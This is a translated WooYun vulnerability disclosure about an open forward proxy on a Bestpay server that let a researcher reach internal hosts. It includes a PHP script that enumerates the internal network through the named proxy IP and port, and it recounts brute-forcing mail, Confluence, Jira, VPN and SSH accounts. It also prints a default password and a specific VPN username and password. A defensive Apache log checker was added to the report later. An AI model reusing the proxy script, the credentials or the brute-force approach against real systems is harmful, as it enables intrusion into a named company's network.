
Vulnerability summary

Defect ID: wooyun-2016-0167887

Title: Improper proxy configuration on a Bestpay (翼支付) webserver allows roaming of the internal network (large numbers of mailboxes, VPN accounts and internal servers compromised)

Vendor: bestpay.com.cn

Author: 路人甲

Submitted: 2016-01-06 18:18

Fixed: 2016-02-20 15:48

Published: 2016-02-20 15:48

Vulnerability type: application configuration error

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-01-06: Details notified to the vendor, awaiting vendor action
2016-01-08: Vendor confirmed; details disclosed to the vendor only
2016-01-18: Details disclosed to core white hats and relevant domain experts
2016-01-28: Details disclosed to regular white hats
2016-02-07: Details disclosed to intern white hats
2016-02-20: Details disclosed to the public

Brief description:

Improper proxy configuration on a Bestpay (翼支付) webserver allows roaming of the internal network (large numbers of mailboxes, VPN accounts and internal servers compromised)

Detailed description:

http://bill.bestpay.com.cn:37006
The webserver's proxy is misconfigured: it accepts requests whose target is an absolute URI and relays them as a forward proxy, so an external client can reach hosts on the internal network. The exchange below, captured through that proxy, fetches the front page of the internal Domino mail server.

Connection to 116.228.151.49 port 37010 [tcp/*] succeeded!
GET http://mail.bestpay.com.cn/ HTTP/1.0
HTTP/1.1 200 OK
Date: Tue, 05 Jan 2016 02:17:57 GMT
Server: Apache/2.4.9 (Unix) OpenSSL/1.0.1g
Last-Modified: Thu, 12 Nov 2015 18:17:27 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 280
Cache-control: private
ETag: W/"MTAtODA4NS00ODI1N0RCRDAwNEU2NzIwLTAtMA=="
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN">
<html>
<head>
<script language="JavaScript" type="text/javascript">
<!--
self._domino_name = "_Main";
// -->
</script>
</head>
<frameset>
<frame name="Main" src="/loadpage.nsf/MainForm?OpenForm">
</frameset>
</html>


I wrote a small PHP script to enumerate the internal network's web services through the proxy:

<?php
// Each request is sent through the misconfigured webserver, which relays
// absolute-URI requests to the internal host named in the URL.
$url = $argv[1];  // the internal URL to fetch; the original snippet left $url undefined
$ctx = array(
    "http" => array(
        'timeout' => 5,
        'proxy' => 'tcp://116.228.151.49:37006',
        'request_fulluri' => true,   // send the absolute URI, as a proxy expects
    ),
    "ssl" => array(
        'verify_peer' => false,      // internal hosts present untrusted certificates
    ),
);
$result = file_get_contents($url, false, stream_context_create($ctx));
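As a defender-side counterpart, added here and not part of the original report: this Python check scans Apache access log lines (the server above reports Apache/2.4.9) for the signature of forward-proxy abuse, request targets in absolute-URI form or CONNECT tunnels, and flags those aimed at private address ranges. The log format, client addresses and sample lines are constructed; the target hosts in the samples are taken from the report.

```python
"""Flag forward-proxy abuse in Apache access logs (constructed example).

An open forward proxy used to reach internal hosts leaves request lines whose
target is an absolute URI (or a CONNECT tunnel) instead of an origin-form path.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Apache combined log format; only the fields this check needs are named.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)

def is_internal(host: str) -> bool:
    """True if host is an IP address in a private/special-purpose range."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False  # hostnames are not resolved: this check runs offline

def find_proxy_abuse(log_lines):
    """Return (client, method, target, internal) for each proxied request."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        method, target = m['method'], m['target']
        if method == 'CONNECT':
            host = target.rsplit(':', 1)[0]         # CONNECT host:port
        elif target.startswith(('http://', 'https://')):
            host = urlsplit(target).hostname or ''  # absolute-form target
        else:
            continue                                # ordinary origin-form request
        findings.append((m['client'], method, target, is_internal(host)))
    return findings

# Constructed sample log lines modelled on the report (hosts taken from it).
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jan/2016:10:17:57 +0800] "GET http://mail.bestpay.com.cn/ HTTP/1.0" 200 280 "-" "-"',
    '203.0.113.7 - - [05/Jan/2016:10:18:02 +0800] "GET http://172.17.16.52:8080/ HTTP/1.0" 200 1532 "-" "-"',
    '198.51.100.9 - - [05/Jan/2016:10:18:05 +0800] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Jan/2016:10:18:09 +0800] "CONNECT 172.17.16.20:22 HTTP/1.1" 200 0 "-" "-"',
]

if __name__ == '__main__':
    for client, method, target, internal in find_proxy_abuse(SAMPLE_LOG):
        print(client, method, target, 'INTERNAL' if internal else 'external')
```

Any hit on a server that is not meant to be a forward proxy is a misconfiguration worth fixing (for Apache, `ProxyRequests Off` unless forwarding is intended, and a `<Proxy>` block restricting who may use it).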


Brute-forcing the mail system turned up several mailboxes with weak passwords.



The Confluence system at http://172.17.16.52:8090/ also had weak-password accounts.



The passwords were the username followed by 123.
A list of employee usernames was obtained from Confluence, and the mail system turned out to have a default password: abcd_123.
A second brute-force pass yielded a large number of mailbox accounts and passwords.



Continuing the brute-forcing, Jira also had weak passwords.



Next, the VPN:
https://vpn.bestpay.com.cn



Base64-decoding gives the VPN usernames; the password is abcd_123.
liuchao Abcd_123
After logging into the VPN, internal network information was collected and SSH was brute-forced.



Four internal machines were compromised, two of them Oracle servers and one an app server.

Proof of vulnerability:

[Nine screenshots taken on 2016-01-06 between 5:44 PM and 6:03 PM; images not reproduced here.]

Remediation:

Copyright: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2016-01-08 08:52

Vendor reply:

Thank you for your attention to Bestpay's business. The issue does indeed exist, and staff have been assigned to fix it.

Latest status:

None yet


Comments:

  1. 2016-01-06 21:52 | rockes (Intern white hat | Rank:38 Vulns:17 | http://rocke.aliapp.com/)

    I know who you are, you're from PX!

  2. 2016-01-07 09:28 | 带我玩 (Passer-by | Rank:14 Vulns:7 | 带我玩)

    I know who you are, you're from PX!